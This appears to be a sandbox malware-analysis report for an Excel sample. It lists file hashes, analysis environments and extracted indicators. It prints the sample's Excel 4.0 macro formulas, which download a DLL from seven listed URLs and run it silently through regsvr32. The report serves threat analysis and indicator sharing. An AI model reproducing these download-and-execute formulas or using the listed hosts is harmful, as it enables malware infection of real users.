General
-
Target
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a
-
Size
29KB
-
Sample
240909-1zrtqsseqr
-
MD5
cd0dcdbdfc1cf4b526986ec894b047d5
-
SHA1
eeb5a806d9b67394a5bf71f61f6b25968fca24ae
-
SHA256
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a
-
SHA512
9f64916b236800db0888acc33f6a92022a584b4049f0409b53717f81c8701515c0c87cabbfdabeab68b4d71d813b43cfa8c870d749e66246abdd375c06217024
-
SSDEEP
384:2ClT2l8Un7pfmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqzGFzHZnRCMfUVhnI6k8PS:2ClnUn7FmD4ys2ewg4F32B3HpoxxJja
Static task
static1
Behavioral task
behavioral1
Sample
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a.xlsx
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
https://www.casache.com/web/gTj3TrZ/
https://www.aulavirtualapecc.com/server/oib/
http://30aweddingco.com/cgi-bin/QUx/
http://blacksmithbooks.com/blog/OkmsfYUA/
http://consultores-sic.com/fw/AOOfOtj1qqgLWR/
http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/
https://damjangro.org/data/XPMJ/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.casache.com/web/gTj3TrZ/","..\rfs.dll",0,0)
=IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/oib/","..\rfs.dll",0,0))
=IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://30aweddingco.com/cgi-bin/QUx/","..\rfs.dll",0,0))
=IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blacksmithbooks.com/blog/OkmsfYUA/","..\rfs.dll",0,0))
=IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consultores-sic.com/fw/AOOfOtj1qqgLWR/","..\rfs.dll",0,0))
=IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/","..\rfs.dll",0,0))
=IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/XPMJ/","..\rfs.dll",0,0))
=IF('LFEVE'!F23<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll")
=RETURN()
Targets
-
-
Target
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a
-
Size
29KB
-
MD5
cd0dcdbdfc1cf4b526986ec894b047d5
-
SHA1
eeb5a806d9b67394a5bf71f61f6b25968fca24ae
-
SHA256
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a
-
SHA512
9f64916b236800db0888acc33f6a92022a584b4049f0409b53717f81c8701515c0c87cabbfdabeab68b4d71d813b43cfa8c870d749e66246abdd375c06217024
-
SSDEEP
384:2ClT2l8Un7pfmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqzGFzHZnRCMfUVhnI6k8PS:2ClnUn7FmD4ys2ewg4F32B3HpoxxJja
Score
3/10
-